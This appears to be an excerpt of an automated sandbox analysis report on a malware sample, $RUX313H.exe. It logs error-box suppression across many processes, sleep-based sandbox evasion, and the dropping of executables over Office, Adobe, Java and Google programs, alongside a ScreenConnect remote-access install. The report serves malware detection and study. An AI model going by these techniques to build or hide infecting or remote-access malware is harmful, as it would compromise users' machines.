                          Source: C:\Windows\svchost.comProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\svchost.comProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\svchost.comProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\svchost.comProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\svchost.comProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\svchost.comProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\svchost.comProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\svchost.comProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\svchost.comProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\svchost.comProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\svchost.comProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\svchost.comProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\svchost.comProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\svchost.comProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Program Files (x86)\ScreenConnect Client (77af187dd37f08fd)\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Program Files (x86)\ScreenConnect Client (77af187dd37f08fd)\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Program Files (x86)\ScreenConnect Client (77af187dd37f08fd)\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Program Files (x86)\ScreenConnect Client (77af187dd37f08fd)\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Program Files (x86)\ScreenConnect Client (77af187dd37f08fd)\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Program Files (x86)\ScreenConnect Client (77af187dd37f08fd)\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Program Files (x86)\ScreenConnect Client (77af187dd37f08fd)\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Program Files (x86)\ScreenConnect Client (77af187dd37f08fd)\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Program Files (x86)\ScreenConnect Client (77af187dd37f08fd)\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Program Files (x86)\ScreenConnect Client (77af187dd37f08fd)\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Program Files (x86)\ScreenConnect Client (77af187dd37f08fd)\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Program Files (x86)\ScreenConnect Client (77af187dd37f08fd)\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Program Files (x86)\ScreenConnect Client (77af187dd37f08fd)\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Program Files (x86)\ScreenConnect Client (77af187dd37f08fd)\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Program Files (x86)\ScreenConnect Client (77af187dd37f08fd)\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Program Files (x86)\ScreenConnect Client (77af187dd37f08fd)\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Program Files (x86)\ScreenConnect Client (77af187dd37f08fd)\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Program Files (x86)\ScreenConnect Client (77af187dd37f08fd)\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Program Files (x86)\ScreenConnect Client (77af187dd37f08fd)\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Program Files (x86)\ScreenConnect Client (77af187dd37f08fd)\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Program Files (x86)\ScreenConnect Client (77af187dd37f08fd)\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Program Files (x86)\ScreenConnect Client (77af187dd37f08fd)\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Program Files (x86)\ScreenConnect Client (77af187dd37f08fd)\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Program Files (x86)\ScreenConnect Client (77af187dd37f08fd)\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Program Files (x86)\ScreenConnect Client (77af187dd37f08fd)\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Program Files (x86)\ScreenConnect Client (77af187dd37f08fd)\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Program Files (x86)\ScreenConnect Client (77af187dd37f08fd)\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Program Files (x86)\ScreenConnect Client (77af187dd37f08fd)\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Program Files (x86)\ScreenConnect Client (77af187dd37f08fd)\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Program Files (x86)\ScreenConnect Client (77af187dd37f08fd)\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Program Files (x86)\ScreenConnect Client (77af187dd37f08fd)\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Program Files (x86)\ScreenConnect Client (77af187dd37f08fd)\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Program Files (x86)\ScreenConnect Client (77af187dd37f08fd)\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Program Files (x86)\ScreenConnect Client (77af187dd37f08fd)\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Program Files (x86)\ScreenConnect Client (77af187dd37f08fd)\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Program Files (x86)\ScreenConnect Client (77af187dd37f08fd)\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Program Files (x86)\ScreenConnect Client (77af187dd37f08fd)\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Program Files (x86)\ScreenConnect Client (77af187dd37f08fd)\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Program Files (x86)\ScreenConnect Client (77af187dd37f08fd)\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Program Files (x86)\ScreenConnect Client (77af187dd37f08fd)\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Program Files (x86)\ScreenConnect Client (77af187dd37f08fd)\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Program Files (x86)\ScreenConnect Client (77af187dd37f08fd)\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Program Files (x86)\ScreenConnect Client (77af187dd37f08fd)\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Program Files (x86)\ScreenConnect Client (77af187dd37f08fd)\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Program Files (x86)\ScreenConnect Client (77af187dd37f08fd)\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Program Files (x86)\ScreenConnect Client (77af187dd37f08fd)\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Program Files (x86)\ScreenConnect Client (77af187dd37f08fd)\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Program Files (x86)\ScreenConnect Client (77af187dd37f08fd)\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Program Files (x86)\ScreenConnect Client (77af187dd37f08fd)\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Program Files (x86)\ScreenConnect Client (77af187dd37f08fd)\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Program Files (x86)\ScreenConnect Client (77af187dd37f08fd)\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Program Files (x86)\ScreenConnect Client (77af187dd37f08fd)\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Program Files (x86)\ScreenConnect Client (77af187dd37f08fd)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Program Files (x86)\ScreenConnect Client (77af187dd37f08fd)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Program Files (x86)\ScreenConnect Client (77af187dd37f08fd)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Program Files (x86)\ScreenConnect Client (77af187dd37f08fd)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Program Files (x86)\ScreenConnect Client (77af187dd37f08fd)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Program Files (x86)\ScreenConnect Client (77af187dd37f08fd)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Program Files (x86)\ScreenConnect Client (77af187dd37f08fd)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Program Files (x86)\ScreenConnect Client (77af187dd37f08fd)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Program Files (x86)\ScreenConnect Client (77af187dd37f08fd)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Program Files (x86)\ScreenConnect Client (77af187dd37f08fd)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Program Files (x86)\ScreenConnect Client (77af187dd37f08fd)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Program Files (x86)\ScreenConnect Client (77af187dd37f08fd)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Program Files (x86)\ScreenConnect Client (77af187dd37f08fd)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Program Files (x86)\ScreenConnect Client (77af187dd37f08fd)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Program Files (x86)\ScreenConnect Client (77af187dd37f08fd)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Program Files (x86)\ScreenConnect Client (77af187dd37f08fd)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Program Files (x86)\ScreenConnect Client (77af187dd37f08fd)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Program Files (x86)\ScreenConnect Client (77af187dd37f08fd)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Program Files (x86)\ScreenConnect Client (77af187dd37f08fd)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Program Files (x86)\ScreenConnect Client (77af187dd37f08fd)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Program Files (x86)\ScreenConnect Client (77af187dd37f08fd)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Program Files (x86)\ScreenConnect Client (77af187dd37f08fd)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Program Files (x86)\ScreenConnect Client (77af187dd37f08fd)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Program Files (x86)\ScreenConnect Client (77af187dd37f08fd)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Program Files (x86)\ScreenConnect Client (77af187dd37f08fd)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Program Files (x86)\ScreenConnect Client (77af187dd37f08fd)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Program Files (x86)\ScreenConnect Client (77af187dd37f08fd)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Program Files (x86)\ScreenConnect Client (77af187dd37f08fd)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Program Files (x86)\ScreenConnect Client (77af187dd37f08fd)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Program Files (x86)\ScreenConnect Client (77af187dd37f08fd)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Program Files (x86)\ScreenConnect Client (77af187dd37f08fd)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Program Files (x86)\ScreenConnect Client (77af187dd37f08fd)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Program Files (x86)\ScreenConnect Client (77af187dd37f08fd)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Program Files (x86)\ScreenConnect Client (77af187dd37f08fd)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Program Files (x86)\ScreenConnect Client (77af187dd37f08fd)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Program Files (x86)\ScreenConnect Client (77af187dd37f08fd)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Program Files (x86)\ScreenConnect Client (77af187dd37f08fd)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Program Files (x86)\ScreenConnect Client (77af187dd37f08fd)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Program Files (x86)\ScreenConnect Client (77af187dd37f08fd)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Program Files (x86)\ScreenConnect Client (77af187dd37f08fd)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Program Files (x86)\ScreenConnect Client (77af187dd37f08fd)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Program Files (x86)\ScreenConnect Client (77af187dd37f08fd)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Program Files (x86)\ScreenConnect Client (77af187dd37f08fd)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Program Files (x86)\ScreenConnect Client (77af187dd37f08fd)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Program Files (x86)\ScreenConnect Client (77af187dd37f08fd)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Program Files (x86)\ScreenConnect Client (77af187dd37f08fd)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Program Files (x86)\ScreenConnect Client (77af187dd37f08fd)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Program Files (x86)\ScreenConnect Client (77af187dd37f08fd)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Program Files (x86)\ScreenConnect Client (77af187dd37f08fd)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Program Files (x86)\ScreenConnect Client (77af187dd37f08fd)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Local\Temp\3582-490\$RUX313H.exe TID: 2016Thread sleep time: -922337203685477s >= -30000sJump to behavior
                          Source: C:\Program Files (x86)\ScreenConnect Client (77af187dd37f08fd)\ScreenConnect.ClientService.exe TID: 5048Thread sleep count: 222 > 30
                          Source: C:\Windows\System32\svchost.exe TID: 3976Thread sleep time: -240000s >= -30000s
                          Source: C:\Users\user\AppData\Local\Temp\3582-490\$RUX313H.exeEvasive API call chain: GetModuleFileName,DecisionNodes,ExitProcessgraph_1-19808
                          Source: C:\Users\user\AppData\Local\Temp\3582-490\$RUX313H.exeThread delayed: delay time: 922337203685477Jump to behavior
                          Source: C:\Windows\svchost.comAPI coverage: 9.7 %
                          Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files (x86)\ScreenConnect Client (77af187dd37f08fd)\ScreenConnect.Client.dllJump to dropped file
                          Source: C:\Users\user\Desktop\$RUX313H.exeDropped PE file which has not been started: C:\Program Files (x86)\Common Files\microsoft shared\VSTO\10.0\VSTOInstaller.exeJump to dropped file
                          Source: C:\Users\user\Desktop\$RUX313H.exeDropped PE file which has not been started: C:\Program Files (x86)\Java\jre1.8.0_211\bin\ssvagent.exeJump to dropped file
                          Source: C:\Users\user\Desktop\$RUX313H.exeDropped PE file which has not been started: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AdobeCollabSync.exeJump to dropped file
                          Source: C:\Users\user\Desktop\$RUX313H.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\Office16\AppSharingHookController.exeJump to dropped file
                          Source: C:\Users\user\Desktop\$RUX313H.exeDropped PE file which has not been started: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\reader_sl.exeJump to dropped file
                          Source: C:\Users\user\Desktop\$RUX313H.exeDropped PE file which has not been started: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\wow_helper.exeJump to dropped file
                          Source: C:\Users\user\Desktop\$RUX313H.exeDropped PE file which has not been started: C:\Program Files (x86)\Common Files\Java\Java Update\jaureg.exeJump to dropped file
                          Source: C:\Users\user\Desktop\$RUX313H.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\Office16\POWERPNT.EXEJump to dropped file
                          Source: C:\Users\user\Desktop\$RUX313H.exeDropped PE file which has not been started: C:\Program Files (x86)\Java\jre1.8.0_211\bin\jp2launcher.exeJump to dropped file
                          Source: C:\Users\user\Desktop\$RUX313H.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\Office16\ACCICONS.EXEJump to dropped file
                          Source: C:\Users\user\Desktop\$RUX313H.exeDropped PE file which has not been started: C:\ProgramData\Package Cache\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}\vcredist_x86.exeJump to dropped file
                          Source: C:\Users\user\Desktop\$RUX313H.exeDropped PE file which has not been started: C:\Program Files (x86)\Java\jre1.8.0_211\bin\javaw.exeJump to dropped file
                          Source: C:\Users\user\Desktop\$RUX313H.exeDropped PE file which has not been started: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\Office Setup Controller\Setup.exeJump to dropped file
                          Source: C:\Users\user\Desktop\$RUX313H.exeDropped PE file which has not been started: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\MSOXMLED.EXEJump to dropped file
                          Source: C:\Users\user\Desktop\$RUX313H.exeDropped PE file which has not been started: C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exeJump to dropped file
                          Source: C:\Users\user\Desktop\$RUX313H.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\Office16\protocolhandler.exeJump to dropped file
                          Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Windows\Installer\MSI13D3.tmpJump to dropped file
                          Source: C:\Users\user\Desktop\$RUX313H.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\Office16\SETLANG.EXEJump to dropped file
                          Source: C:\Users\user\Desktop\$RUX313H.exeDropped PE file which has not been started: C:\MSOCache\All Users\{90160000-0011-0000-0000-0000000FF1CE}-C\ose.exeJump to dropped file
                          Source: C:\Users\user\Desktop\$RUX313H.exeDropped PE file which has not been started: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exeJump to dropped file
                          Source: C:\Windows\SysWOW64\rundll32.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\MSIFE41.tmp-\ScreenConnect.InstallerActions.dllJump to dropped file
                          Source: C:\Users\user\Desktop\$RUX313H.exeDropped PE file which has not been started: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\Oarpmany.exeJump to dropped file
                          Source: C:\Users\user\Desktop\$RUX313H.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\Office16\DCF\DATABASECOMPARE.EXEJump to dropped file
                          Source: C:\Windows\SysWOW64\rundll32.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\MSIFE41.tmp-\Microsoft.Deployment.WindowsInstaller.dllJump to dropped file
                          Source: C:\Users\user\Desktop\$RUX313H.exeDropped PE file which has not been started: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins\pi_brokers\64BitMAPIBroker.exeJump to dropped file
                          Source: C:\Users\user\Desktop\$RUX313H.exeDropped PE file which has not been started: C:\Program Files (x86)\Google\Update\1.3.35.452\GoogleUpdateOnDemand.exeJump to dropped file
                          Source: C:\Users\user\Desktop\$RUX313H.exeDropped PE file which has not been started: C:\Program Files (x86)\AutoIt3\AutoIt3Help.exeJump to dropped file
                          Source: C:\Users\user\Desktop\$RUX313H.exeDropped PE file which has not been started: C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe.exeJump to dropped file
                          Source: C:\Users\user\Desktop\$RUX313H.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\Office16\MSOUC.EXEJump to dropped file
                          Source: C:\Users\user\Desktop\$RUX313H.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\Office16\PPTICO.EXEJump to dropped file
                          Source: C:\Users\user\Desktop\$RUX313H.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\Office16\CNFNOT32.EXEJump to dropped file
                          Source: C:\Users\user\Desktop\$RUX313H.exeDropped PE file which has not been started: C:\Program Files (x86)\Common Files\microsoft shared\DW\DWTRIG20.EXEJump to dropped file
                          Source: C:\Users\user\Desktop\$RUX313H.exeDropped PE file which has not been started: C:\Program Files (x86)\Google\Update\1.3.35.452\GoogleCrashHandler64.exeJump to dropped file
                          Source: C:\Users\user\Desktop\$RUX313H.exeDropped PE file which has not been started: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroBroker.exeJump to dropped file
                          Source: C:\Users\user\Desktop\$RUX313H.exeDropped PE file which has not been started: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\FLTLDR.EXEJump to dropped file
                          Source: C:\Users\user\Desktop\$RUX313H.exeDropped PE file which has not been started: C:\ProgramData\Package Cache\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}\vcredist_x64.exeJump to dropped file
                          Source: C:\Users\user\Desktop\$RUX313H.exeDropped PE file which has not been started: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins\pi_brokers\32BitMAPIBroker.exeJump to dropped file
                          Source: C:\Users\user\Desktop\$RUX313H.exeDropped PE file which has not been started: C:\Program Files (x86)\AutoIt3\Au3Check.exeJump to dropped file
                          Source: C:\Users\user\Desktop\$RUX313H.exeDropped PE file which has not been started: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\LICLUA.EXEJump to dropped file
                          Source: C:\Users\user\Desktop\$RUX313H.exeDropped PE file which has not been started: C:\MSOCache\All Users\{90160000-0011-0000-0000-0000000FF1CE}-C\setup.exeJump to dropped file
                          Source: C:\Users\user\Desktop\$RUX313H.exeDropped PE file which has not been started: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_885250\java.exeJump to dropped file
                          Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Windows\Installer\MSI1045.tmpJump to dropped file
                          Source: C:\Users\user\Desktop\$RUX313H.exeDropped PE file which has not been started: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\FullTrustNotifier.exeJump to dropped file
                          Source: C:\Users\user\Desktop\$RUX313H.exeDropped PE file which has not been started: C:\Program Files (x86)\Common Files\microsoft shared\Source Engine\OSE.EXEJump to dropped file
